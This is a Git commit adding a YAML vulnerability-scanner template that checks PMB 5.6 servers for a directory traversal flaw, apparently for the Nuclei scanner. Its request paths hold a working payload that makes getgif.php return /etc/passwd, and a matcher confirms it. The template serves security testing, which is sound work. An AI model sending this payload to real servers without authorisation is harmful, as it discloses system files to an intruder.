Create pmb-directory-traversal.yaml

patch-1
Prince Chaddha 2021-08-16 16:14:02 +05:30 committed by GitHub
parent 451823f887
commit 4e498a6478
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

View File

@ -0,0 +1,22 @@
id: pmb-directory-traversal
info:
name: PMB 5.6 Directory Traversal
reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
author: geeknik
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
- "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- type: status
status:
- 200